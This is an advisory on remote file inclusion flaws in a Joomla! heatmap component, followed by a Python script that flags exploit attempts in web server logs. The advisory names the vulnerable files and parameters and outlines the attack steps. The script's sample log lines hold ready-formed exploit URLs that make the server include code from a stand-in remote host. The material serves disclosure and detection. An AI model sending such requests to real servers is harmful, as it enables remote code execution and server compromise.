Multiple PHP remote file inclusion vulnerabilities in the Clickheat - Heatmap stats (com_clickheat) component 1.0.1 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) install.clickheat.php, (b) Cache.php and (c) Clickheat_Heatmap.php in Recly/Clickheat/, and (d) Recly/common/GlobalVariables.php; and the (2) mosConfig_absolute_path parameter to (e) _main.php and (f) main.php in includes/heatmap, and (g) includes/overview/main.php.
Clickheat, a Joomla! component, is vulnerable to multiple remote file inclusion (RFI) flaws. Attackers can leverage these vulnerabilities to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.
Step 1: Identify Vulnerable Files: The attacker identifies the vulnerable files within the Clickheat component: install.clickheat.php, Cache.php and Clickheat_Heatmap.php in Recly/Clickheat/, Recly/common/GlobalVariables.php, _main.php and main.php in includes/heatmap, and includes/overview/main.php.
Step 2: Craft Malicious Payload: The attacker crafts a malicious PHP script designed to execute arbitrary commands or gain control of the server. This script is hosted on a server controlled by the attacker.
Step 3: Construct Exploit URL: The attacker constructs a URL that exploits the RFI vulnerability. This URL typically includes the vulnerable file's path and the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter, set to the URL of the attacker's malicious PHP script.
Step 4: Send Exploit Request: The attacker sends the crafted URL to the vulnerable Joomla! installation.
Step 5: Server Processes Request: The Joomla! server receives the request and, due to the vulnerability, attempts to include the file specified by the attacker-controlled URL.
Step 6: Execute Malicious Code: The server executes the attacker's PHP code, granting the attacker control over the server's resources.
The vulnerability stems from the insecure use of the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] variables within the Clickheat component. These variables are intended to define the absolute path to the Joomla! installation. However, the component fails to properly sanitize user-supplied input when including PHP files using these variables. This allows an attacker to inject a malicious URL pointing to a PHP script hosted on a remote server. When the vulnerable component attempts to include this URL, the attacker's PHP code is executed on the server, granting them control over the web server and potentially the underlying system. The root cause is a lack of input validation and sanitization, specifically failing to validate the source of the included files, leading to a classic RFI vulnerability.
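The two sink parameters described above are easy to pick out of web server access logs, which is where a defender would look for attempts against an unpatched install. The following detection check is added here as an example and is not part of the advisory; the log lines are constructed, and the scheme list and log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# The two request parameters the advisory names as include() sinks.
RFI_PARAMS = {"mosConfig_absolute_path", "GLOBALS[mosConfig_absolute_path]"}
# Stream wrappers PHP's include() can resolve (assumed list); a legitimate
# absolute filesystem path never starts with one of these.
URL_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|phar):", re.IGNORECASE)
# Common Log Format prefix: client ident user [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (not real traffic). Line 2 percent-encodes the
# scheme; line 3 is a normal page view; line 4 targets a different component.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2008:13:55:36 +0000] "GET /components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=http://198.51.100.7/s.txt HTTP/1.1" 200 512
192.0.2.44 - - [10/Oct/2008:13:56:01 +0000] "GET /components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=%68%74%74%70%3A%2F%2F198.51.100.7/s.txt HTTP/1.1" 200 512
192.0.2.10 - - [10/Oct/2008:13:57:12 +0000] "GET /index.php?option=com_clickheat&task=view HTTP/1.1" 200 9031
198.51.100.2 - - [10/Oct/2008:13:58:40 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http://198.51.100.7/s.txt HTTP/1.1" 404 221
"""

def rfi_parameter(target: str):
    """Return (name, value) of the first sink parameter set to a URL, else None."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes one layer; decode once more to catch double encoding.
        if unquote(name) in RFI_PARAMS and URL_SCHEME.match(unquote(value)):
            return name, unquote(value)
    return None

def find_rfi_attempts(log_text: str) -> list:
    """Scan access-log text and return one dict per suspected RFI request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, method, target, status = m.groups()
        found = rfi_parameter(target)
        if found:
            hits.append({
                "client": client, "time": when, "target": target, "status": status,
                "param": found[0], "include_url": found[1],
                # True when the request hits a file under com_clickheat itself.
                "clickheat": "com_clickheat" in target.lower(),
            })
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['client']} {hit['param']} -> {hit['include_url']} (clickheat={hit['clickheat']})")
```

A 200 status on a hit against an unpatched site is the case to escalate; the same parameter names appear in requests to other components, so the check does not restrict itself to com_clickheat paths.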